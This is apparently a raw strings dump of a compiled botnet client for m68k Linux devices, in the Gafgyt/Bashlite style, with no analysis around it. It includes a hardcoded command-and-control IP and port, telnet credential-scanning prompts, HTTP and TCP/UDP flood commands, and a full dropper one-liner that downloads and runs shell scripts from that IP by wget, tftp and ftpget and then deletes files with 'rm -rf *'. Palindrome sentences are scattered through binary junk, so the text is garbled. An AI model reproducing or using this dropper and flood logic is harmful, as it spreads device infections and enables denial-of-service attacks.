N^NuNV
f>"y
N^NuNV
N^NuNV
N^NuNV
N^Nu
 OHWHQHy
`J$.
N^NuNV
b` 9
b\-@
b\".
b\"9
b`"n
N^NuNV
`  .
N^NuNV
 P .
N^NuNV
p -@
p0-@
`" n
N^NuNV
`L .
N^NuNV
N^NuNV
fffg$
#0Hy
`X .
` /.
N^NuNV
`4 .
sfL".
df:".
xf8".
Xf8".
uf6".
`d n
cfX".
N^NuNV
N^NuNV
N^NuNV
#I/.
N^NuNV
rf: .
g  .
`4 .
#RHy
#UHy
N^NuNV
N^NuNV
`$ .
 @N^NuNV
`. .
#` 0
N^NuNV
g(p?
g* n
`d n
N^NuNV
N^NuNV
`$ n
N^NuNV
N^NuNV
N^NuNV
`N .
N^NuNV
 @$6
 @$6
`R 9
LN^NuNV
 @$6
L`FB
L`@B
L`:B
HN^NuNV
`& .
N^NuNV
`j n
`T n
f$ n
`" n
N^NuNV
of .
N^NuNV
 @$6
f^ .
\`f/.
`  .
XN^NuNV
N^NuNV
N^NuNV
`6 n
o` n
`0$.
B@HAH@(
B@HAH@
<N^NuNV
p -@
"H @ 
N^NuNV
N^NuNV
N^NuNV
D @P
"@ n
BP n
"@ n
fh n
f( n
D @P
 @"n
gN n
f.$.
"@ n
gn n
BP n
fj n
f.$.
"@ n
g" n
BP n
2@ n
bT 0
bT&0
ln n
ln n
f.$.
"@ n
BP n
g$ n
`" n
gl n
2@ n
	4 n
bX 0
bX&0
ln n
ln n
f.$.
Borrow or rob
"@ n
BP n
2@ n
ln n
f.$.
"@ n
cj n
NqNV
N^NuNV
N^NuNV
NqNV
p2-@
N^NuNV
fT n
`p .
`F .
N^NuNV
	( n
f./9
f4 9
fN 9
gn .
f*/.
"P n
"@ n
jr n
alula
gb .
gr .
f./.
`` .
gD .
g& .
N^NuNV
bP 9
bL 0
N^NuNV
``Hy
`"".
N^NuNV
 @N^NuNV
`. .
`& .
B6	 
`$ n
gn$.
BNq"_ <
N@"<
NuNV
 A-P
`V-n
p7N@-@
N^NuNV
N@-@
N^NuNV
 A-P
N^NuNuNV
N@-@
N^NuNV
NqNV
N@-@
N^NuNV
N^NuNuNV
N@-@
N^NuNV
p?N@-@
N^NuNV
N@-@
N^NuNV
N^NuNV
N@-@
N^NuNV
N@-@
N^NuNuNV
 A-P
Beeb
"	p6N@-@
N^NuNuNV
p%N@-@
N^NuNV
N^NuNV
N@-@
N^NuNV
 A-P
N^NuNV
N^NuNV
p*N@-@
N^NuNuNV
<0&n
N@-@
N^NuNuNV
0 $n
N@-@
N^NuNV
<8&n
N@-@
N^NuNV
pBN@-@
N^NuNV
`h-n
N@-@
N^NuNV
N@-@
N^NuNuNV
N^NuNuNV
0 $n
N@-@
N^NuNV
bh A
N^NuNV
bp A
0@-H
N^NuNV
 @N^NuNV
f40|
N^NuNV
 @N^NuNuNV
f40|
N^NuNV
N^NuNV
N^NuNV
N^NuNuNV
rgd-|
wgP-|
ag<a
g$ n
fDHx
ml n
fZHx
g( n
 @$.
N^NuNV
N^NuNV
N^NuNV
gH n
`, n
N^NuNV
g, n
N^NuNV
f0p8
N^NuNuNV
N^NuNV
gV .
o0 .
`<-n
o  .
N^NuNV
o( n
f> n
pW-@
f, n
p,-@
e* n
p7-@
dZ n
-f "n
`. n
gd n
p	-@
f. .
b$ n
0f:p
fn .
fV .
 @-P
>g6 n
`|-|
`D n
f. .
`<".
N^NuNV
lB .
g& .
gh .
o*".
gl n
%gLR
<`"-n
0N^NuNV
p	-@
`P n
%f@R
%g0 n
`$ n
N^NuNV
oH n
N^NuNV
f(0|
f(0|
`v0|
`Z0|
`:2|
`| n
f. n
f. n
lD n
p  n
$_N^NuNuNV
N^NuNV
`,/.
N^NuNV
n  .
bh A
$f2J
oF-n
0fp-n
*fZJ
g4 n
f -n
1P00
1@00
p0-@
r -A
f* n
m,".
F`4 n
N^NuNuNV
f40|
 @N^NuNuNV
`p n
N^NuNV
g40|
f8/.
f" n
(`N n
g8/.
f" n
N^NuNV
c4"n
f``R/.
fH`. .
 @N^NuNuNV
c2"n
gV .
fJ/.
g: n
`: .
N^NuNV
N^NuNV
e, .
N^NuNuNV
`R n
`& n
N^NuNV
`H n
N^NuNV
 @N^NuNuNV
H@B@
`l n
 @N^NuNuNV
`, n
H@B@
f* .
`` n
`8 n
N^NuNuNV
N^NuNuNV
N^NuNV
`  n
`f n
`D n
`" n
N^NuNV
gh n
gJ n
g, n
fL-n
`J n
` J.
N^NuNV
`0 n
f"".
`~ n
g\ .
gT .
g>".
g( .
N^NuNuNV
gr`FJ
 @N^NuNV
 @N^NuNV
e2-|
`F".
p"-@
g& .
N^NuNV
N^NuNuNV
 @N^NuNV
N^NuNV
gn .
N^NuNuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
`b".
 @N^NuNV
 @N^NuNuNV
N^NuNV
 @N^NuNV
g$ .
t"-B
t"-B
r"-A
p"-@
p"-@
gH n
c. .
p"-@
`$ .
fl .
N^NuNV
N^NuNV
N^NuNuNV
N^NuNuNV
N^NuNV
N^NuNV
N^NuNuNV
N^NuNV
N^NuNuNV
N^NuNuNV
N^NuNV
lp -@
`^/.
 @N^NuNuNV
N^NuNV
N^NuNV
N^NuNV
b""9
g4 .
gF/.
 @$.
N^NuNV
f>Hy
 @N^NuNuNV
N^NuNV
 @-P
`j/.
f* 9
N^NuNV
N^NuNuNV
N^NuNV
N^NuNV
`J n
e4".
 @$.
N^NuNV
N^NuNV
N^NuNV
 @N^NuNV
`t n
g>".
Eleele
f& n
`& .
`"/.
 @$.
N^NuNV
N^NuNuNV
N^NuNV
 @N^NuNV
 @N^NuNV
N^NuNV
`*"n
fffg"
=&-p
gR n
fffg$
N^NuNV
f: n
N^NuNV
N^NuNV
=&-p
g*"n
N^NuNV
N^NuNV
N^NuNuNV
bh A
0f*R
`2 n
pt" 
N^NuNuNV
zNqNV
N^NuNuNV
p -@
(r -A
g. .
HN^NuNuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
f&/.
N^NuNV
f8 9
N^NuNV
`>-n
e( n
f" .
gF".
g./<
NqNuNV
"	pfN@-@
N^NuNuNV
0 $n
N@-@
N^NuNV
N@-@
N^NuNV
N@-@
N^NuNV
N@-@
N^NuNV
N@-@
N^NuNV
N@-@
N^NuNuNV
`,-y
 @N^NuNuNV
< $n
"	prN@-@
N^NuNV
N^NuNV
 @N^NuNV
N^NuNV
N^NuNuNV
`L n
`T n
N^NuNuNV
g| .
N^NuNuNV
fh n
gx .
g: .
`D n
N^NuNuNV
f. n
f, n
fj n
g@ n
N^NuNuNV
mp .
`h .
`F n
0@-H
N^NuNuNV
N^NuNV
`$".
N^NuNuNV
`J n
p !@
tp-B
r	-A
gl .
God A red nugget A fat egg under a dog
`h .
`2 .
f8$.
o(Hx
m& .
mL n
oP n
o  n
o& n
l, n
g$ n
gF$.
l4 .
fffg"
fffg$
ov n
g* n
`< n
"P n
`" n
N^NuNuNV
c& n
g: n
S@ n
g& n
gT n
gb n
`4Hx
N^NuNV
H@B@
gn .
`r n
`X n
 @N^NuNV
`~ n
`@ n
N^NuNV
`b n
N^NuNV
 @N^NuNV
 @N^NuNuNV
H@B@
gj-n
`l n
`R n
N^NuNuNV
`R-n
 @N^NuNuNV
`2-n
 @N^NuNuNV
bh A
`> .
bh A
`| n
bh A
`> .
N^NuNuNV
mH 9
o<Hx
:` Hx
gb <
` /.
g  n
fj n
g` <
`" .
gZ <
N^NuNV
g( n
bh A
g@ n
bh A
g4 n
bh A
`:$9
gX .
`< 9
`:$9
HN^NuNV
$N^NuNuNV
gB n
mB .
N^NuNV
p -@
f4Hx
f6 9
f~ 9
p -@
NqNuNV
(N^NuNV
p-N@-@
N^NuNV
80&n
N@-@
N^NuNuNV
N@-@
N^NuNV
N^NuNV
f40|
md n
N^NuNuNV
fd .
N^NuNuNV
gv n
N^NuNV
N^NuNuNV
f. n
f, n
`Z n
g0/.
N^NuNuNV
N^NuNuNV
H@B@
`N n
`4 n
 @N^NuNuNV
`* n
 @N^NuNuNV
`@-n
N^NuNV
 @N^NuNV
lnr9
mf n
`2p.
`L n
N^NuNV
g: .
fv-n
`8p.
f( .
g6 .
gh".
`0 .
N^NuNV
`, .
`& .
N^NuNV
B@H@
0fb"n
B@H@
B@H@
0fTS
`N"n
B@H@
B@H@
B@H@
 @$.
N^NuNV
`J".
"@ .
`f .
f$ .
`> .
`2 .
g( .
g" .
g6 .
n, .
fn .
ff .
fR .
fF .
`0 .
>e/.
 @N^NuNV
g `< .
`, .
 @N^NuNuNV
N^NuNuNV
N^NuNV
`l n
N^NuNuNV
N^NuNV
H@B@
N^NuNV
>yHy
>yHy
 @N^NuNV
g$ .
p"-@
p"-@
p"-@
p"-@
p"-@
p"-@
r"-A
g( n
bh A
g( n
bh A
N`Br
`$ .
fz n
o\ n
fx n
oZ n
N^NuNV
Q./.
N^NuNV
<0&n
N@-@
N^NuNV
N^NuNuNV
0@-H
N^NuNV
g@ n
N^NuNV
N^NuNV
f8J.
N^NuNV
`Rp?F
`0 .
N^NuNuNV
N^NuNV
N^NuNuNV
>N^NuMozilla/4.0 (Compatible; MSIE 8.0; Windows NT 5.2; Trident/6.0)
Mozilla/4.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; pl) Opera 11.00
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; en) Opera 11.00
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; ja) Opera 11.00
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; de) Opera 11.01
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; fr) Opera 11.00
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11) AppleWebKit/601.1.56 (KHTML, like Gecko) Version/9.0 Safari/601.1.56
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.7 (KHTML, like Gecko) Version/9.0.1 Safari/601.2.7
Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)
Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51
Opera/9.80 (X11; Linux i686; Ubuntu/14.10) Presto/2.12.388 Version/12.16
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A
Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36
Mozilla/5.0 (Linux; Android 4.4.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36
Mozilla/5.0 (Linux; Android 4.4.3; HTC_0PCV2 Build/KTU84L) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
Mozilla/4.0 (compatible; MSIE 8.0; X11; Linux x86_64; pl) Opera 11.00
Mozilla/4.0 (compatible; MSIE 9.0; Windows 98; .NET CLR 3.0.04506.30)
Tacocat
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/4.0; GTB7.4; InfoPath.3; SV1; .NET CLR 3.4.53360; WOW64; en-US)
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.0; FDM; MSIECrawler; Media Center PC 5.0)
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 4.4.58799; WOW64; en-US)
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts)
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:21.0) Gecko/20100101 Firefox/21.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:24.0) Gecko/20100101 Firefox/24.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko/20100101 Firefox/33.0
185.69.54.114:5888
root
/usr/dict/words
(null)
buf: %s
/bin/sh
Degas are we not drawn onward no In union drawn onward to new eras aged
/proc/cpuinfo
BOGOMIPS
PING
:>%$#
%d.%d.%d.%d
ogin:
assword:
ncorrect
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.69.54.114/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 185.69.54.114 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 185.69.54.114; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 185.69.54.114 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *
%s %s HTTP/1.1
Host: %s
User-Agent: %s
Connection: close
Failed opening raw socket.
Failed setting raw headers mode.
Invalid flag "%s"
PONG!
GETLOCALIP
My IP: %s
SCANNER
SCANNER ON | OFF
SCANNER STOPPED!
SCANNER STARTED!
HTTP
HTTP %s Flooding %s:%d for %d seconds
KILLATTK
LOLNOGTFO
8.8.8.8
/proc/net/route
	00000000	
QUEER
BUILD %s
BUILD %s
PONG
DUppP
%s 2>&1
Link closed by server.
(nil)
(null)
hlLjztqZ
npxXoudifFeEgGaACScs
 +0-#'I
Unknown error Success
Operation not permitted
No such file or directory
No such process
Interrupted system call
Input/output error
No such device or address
Argument list too long
Exec format error
Bad file descriptor
No child processes
Resource temporarily unavailable
Cannot allocate memory
Permission denied
Bad address
Block device required
Device or resource busy
File exists
Invalid cross-device link
No such device
Not a directory
Is a directory
Invalid argument
Too many open files in system
Too many open files
Inappropriate ioctl for device
Text file busy
File too large
No space left on device
Illegal seek
Read-only file system
Too many links
Broken pipe
Numerical argument out of domain
Numerical result out of range
Resource deadlock avoided
File name too long
No locks available
Function not implemented
Directory not empty
Too many levels of symbolic links
No message of desired type
Identifier removed
Channel number out of range
Level 2 not synchronized
Level 3 halted
Level 3 reset
Link number out of range
Protocol driver not attached
No CSI structure available
Level 2 halted
Invalid exchange
Invalid request descriptor
Exchange full
No anode
Invalid request code
Invalid slot
Bad font file format
Device not a stream
No data available
Timer expired
Out of streams resources
Machine is not on the network
Package not installed
Object is remote
Link has been severed
Advertise error
Srmount error
Communication error on send
Protocol error
Multihop attempted
RFS specific error
Bad message
Value too large for defined data type
Name not unique on network
File descriptor in bad state
Remote address changed
Can not access a needed shared library
Accessing a corrupted shared library
.lib section in a.out corrupted
Attempting to link in too many shared libraries
Cannot exec a shared library directly
Invalid or incomplete multibyte or wide character
Interrupted system call should be restarted
Streams pipe error
Too many users
Socket operation on non-socket
Destination address required
Message too long
Protocol wrong type for socket
Protocol not available
Protocol not supported
Socket type not supported
Operation not supported
Protocol family not supported
Address family not supported by protocol
Address already in use
Cannot assign requested address
Network is down
Network is unreachable
Network dropped connection on reset
Software caused connection abort
Connection reset by peer
No buffer space available
Transport endpoint is already connected
Transport endpoint is not connected
Cannot send after transport endpoint shutdown
Too many references: cannot splice
Connection timed out
Connection refused
Host is down
No route to host
Operation already in progress
Operation now in progress
Stale NFS file handle
Structure needs cleaning
Not a XENIX named type file
No XENIX semaphores available
Is a named type file
Remote I/O error
Disk quota exceeded
No medium found
Wrong medium type
?/dev/null
/etc/resolv.conf
/etc/config/resolv.conf
nameserver
domain
search
0123456789abcdef
/etc/hosts
/etc/config/hosts
S[kA
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
.symtab
.strtab
.shstrtab
.init
.text
.fini
.rodata
.eh_frame
.ctors
.dtors
.jcr
.data
.bss
.comment
libc/sysdeps/linux/m68k/crti.S
have_current_got
crtstuff.c
__CTOR_LIST__
__DTOR_LIST__
__EH_FRAME_BEGIN__
__JCR_LIST__
completed.2170
p.2168
__do_global_dtors_aux
call___do_global_dtors_aux
object.2251
frame_dummy
call_frame_dummy
__CTOR_END__
__DTOR_END__
__FRAME_END__
__JCR_END__
__do_global_ctors_aux
call___do_global_ctors_aux
libc/sysdeps/linux/m68k/crtn.S
libc/sysdeps/linux/m68k/crt1.S
client.c
i.4127
printchar
prints
printi
print
fdopen_pids
hextable
ipState
libc/sysdeps/linux/m68k/vfork.S
fix_errno
__syscall_fcntl.c
__syscall_fcntl64.c
__syscall_fcntl64
_exit.c
__syscall_exit
chdir.c
__syscall_chdir
close.c
dup2.c
fork.c
getdtablesize.c
getpid.c
getrlimit.c
ioctl.c
kill.c
__syscall_kill
open.c
__syscall_open
pipe.c
prctl.c
read.c
select.c
setsid.c
sigprocmask.c
time.c
waitpid.c
write.c
isspace.c
toupper.c
__C_ctype_b.c
__C_ctype_toupper.c
errno.c
__errno_location.c
fclose.c
fopen.c
puts.c
printf.c
sprintf.c
vsnprintf.c
_fopen.c
_stdio.c
_stdio_streams
__stdio_mutex_initializer.3828
_fixed_buffers
_wcommit.c
vfprintf.c
_vfprintf_internal.c
_charpad
_fp_out_narrow
_do_one_spec
spec_base.4041
prefix.4042
_ppfs_init.c
_ppfs_prepargs.c
_ppfs_setargs.c
_ppfs_parsespec.c
_promoted_size
type_codes
type_sizes
_is_equal_or_bigger_arg
spec_flags.4040
qual_chars.4045
spec_chars.4041
spec_ranges.4042
spec_or_mask.4043
spec_and_mask.4044
fgets.c
fflush_unlocked.c
fgets_unlocked.c
fputc_unlocked.c
fputs_unlocked.c
fwrite_unlocked.c
memcpy.c
_wordcopy_fwd_aligned
_wordcopy_fwd_dest_aligned
memset.c
strchr.c
strcmp.c
strcpy.c
strlen.c
strncpy.c
strnlen.c
strstr.c
__glibc_strerror_r.c
__xpg_strerror_r.c
unknown.1089
_string_syserrmsgs.c
bcopy.c
strtok.c
next_start.1067
isatty.c
tcgetattr.c
ntohl.c
inet_ntoa.c
buf.2603
inet_makeaddr.c
gethostbyname.c
buf.4831
h.4830
gethostbyname_r.c
connect.c
getsockname.c
getsockopt.c
recv.c
send.c
sendto.c
setsockopt.c
socket.c
sigaddset.c
sigempty.c
signal.c
sigsetops.c
malloc.c
__malloc_from_heap
initial_fa
free.c
__heap_delete
__free_to_heap
heap_alloc.c
__heap_free_area_alloc
heap_free.c
__heap_link_free_area
__heap_link_free_area_after
__heap_add_free_area
rand.c
random.c
mylock
unsafe_state
randtbl
random_r.c
random_poly_info
atol.c
strtol.c
_stdlib_strto_l.c
exit.c
execl.c
sleep.c
__uClibc_main.c
__pthread_return_0
__pthread_return_void
__check_suid
__check_one_fd
been_there_done_that.2790
__socketcall.c
execve.c
getegid.c
geteuid.c
getgid.c
getuid.c
nanosleep.c
sbrk.c
wait4.c
__syscall_wait4
__h_errno_location.c
wcrtomb.c
wcsrtombs.c
wcsnrtombs.c
_WRITE.c
_fwrite.c
_trans2w.c
_load_inttype.c
Do nine men interpret Nine men I nod
_store_inttype.c
_uintmaxtostr.c
_fpmaxtostr.c
exp10_table
fgetc_unlocked.c
memchr.c
memmove.c
_wordcopy_bwd_aligned
_wordcopy_bwd_dest_aligned
mempcpy.c
memrchr.c
strtok_r.c
strpbrk.c
inet_aton.c
dnslookup.c
static_ns
static_id
opennameservers.c
get_hosts_byname_r.c
sigaction.c
abort.c
been_there_done_that
dl-support.c
brk.c
__syscall_rt_sigaction.c
poll.c
fseeko.c
fseeko64.c
_READ.c
_adjust_pos.c
_rfill.c
_trans2r.c
_cs_funcs.c
rawmemchr.c
strncat.c
strspn.c
strdup.c
ntop.c
inet_pton4
inet_pton6
xdigits.3095
inet_ntop4
inet_ntop6
encodeh.c
decodeh.c
encodeq.c
lengthq.c
decodea.c
read_etc_hosts_r.c
raise.c
llseek.c
__syscall_llseek
tolower.c
__C_ctype_tolower.c
strcasecmp.c
encoded.c
decoded.c
lengthd.c
__fini_array_end
__fini_array_start
__init_array_end
__preinit_array_end
__init_array_start
__preinit_array_start
__read_etc_hosts_r
__GI_execve
__libc_sigaction
strcpy
__GI_fcntl64
recvLine
__GI_sigaddset
__socketcall
__GI___ctype_b
__GI_memchr
__GI___glibc_strerror_r
waitpid
__open_nameservers
__GI_fopen
getrlimit
ioctl
_stdio_openlist_use_count
__GI_initstate_r
__GI_sigaction
strtok_r
__GI___C_ctype_toupper_data
__GI_time
getgid
A Santa lives evil at NASA
printf
stdout
random
__GI_strdup
getdtablesize
__GI_h_errno
__length_question
__GI___ctype_toupper
__GI_strcasecmp
__GI_tolower
putc_unlocked
recv
connect
__encode_question
__GI___uClibc_fini
numpids
__encode_header
__GI_strncat
sigemptyset
__pthread_mutex_lock
initConnection
__sigdelset
__uClibc_fini
memrchr
geteuid
inet_pton
__GI_vsnprintf
__GI_setsid
memmove
sendTCP
__bsd_signal
__GI_strpbrk
__stdio_trans2r_o
__GI_setsockopt
__libc_stack_end
__GI_fclose
__GI_wcsnrtombs
__GI_pipe
_uintmaxtostr
__libc_fcntl
atol
_h_errno
getRandomPublicIP
getc_unlocked
__ctype_b
__GI_random_r
usernames
errno
getegid
__GI_sbrk
zprintf
__GI___uClibc_init
execve
getpid
__GI_lseek64
setstate_r
fgets
getHost
__libc_getpid
wildString
__xpg_strerror_r
__heap_free
fcntl64
prctl
memcpy
makeRandomStr
getRandomIP
__GI_fputs_unlocked
execl
__GI_fgets
sendHTTP
creat
_stdio_openlist_dec_use
sclose
__libc_select
_ppfs_init
puts
__GI___C_ctype_toupper
__GI_fgetc_unlocked
__libc_nanosleep
trim
__GI_fgets_unlocked
dup2
__pthread_mutex_init
tolower
getuid
__open_etc_hosts
malloc
isatty
sleep
__GI_atol
vsnprintf
__dns_lookup
__GI_read
__C_ctype_tolower
random_r
__dso_handle
__malloc_heap_lock
gethostbyname_r
tcpcsum
fdpclose
socket
__GI_dup2
select
_pthread_cleanup_pop_restore
__GI_wcrtomb
__GI___libc_fcntl
__GI_memset
isspace
__stdio_seek
mempcpy
__GI_strcoll
__GI_write
__ctype_toupper
__libc_read
_string_syserrmsgs
__GI_open
__GI_strchr
__searchdomain
__malloc_heap
sigaddset
__GI_tcgetattr
__environ
wcsnrtombs
makeIPPacket
sockprintf
__GI_inet_ntoa
send
__fgetc_unlocked
abort
__GI_fcntl
__GI_wcsrtombs
__GI_fwrite_unlocked
__GI_getgid
srandom_r
_init
__GI_inet_ntoa_r
__GI_setstate_r
parseHex
strtol
pipe
__libc_lseek64
strnlen
rawmemchr
__GI_mempcpy
__GI___C_ctype_b_data
__sigaddset
nanosleep
__GI_send
h_errno
__pthread_mutex_unlock
wait4
__GI_exit
__app_fini
csum
__exit_cleanup
__GI_execl
__GI_srandom_r
__GI___ctype_tolower
write
environ
__GI_close
getBuild
__resolv_lock
kill
fputs_unlocked
__pthread_mutex_trylock
__GI_brk
__GI_nanosleep
__GI_strtok
_stdio_openlist
__GI_sigprocmask
inet_addr
ntohl
__GI_fseek
__deregister_frame_info
ourIP
chdir
fseeko
_stdio_openlist_del_count
connectTimeout
makestring
__raise
setsockopt
bsd_signal
fseek
__GI_kill
__GI_strcmp
__GI_memmove
sendSTD
setstate
__decode_dotted
__stdio_READ
memchr
__GI_toupper
__pthread_initialize_minimal
__GI_recv
__stdin
stdin
__GI_isatty
_start
strstr
__GI_ioctl
init_rand
rand
signal
read
__decode_header
getCores
__GI___h_errno_location
__GI_memcpy
strcoll
wcsrtombs
_stdio_user_locking
filter
strncpy
strcasecmp
htonl
sendto
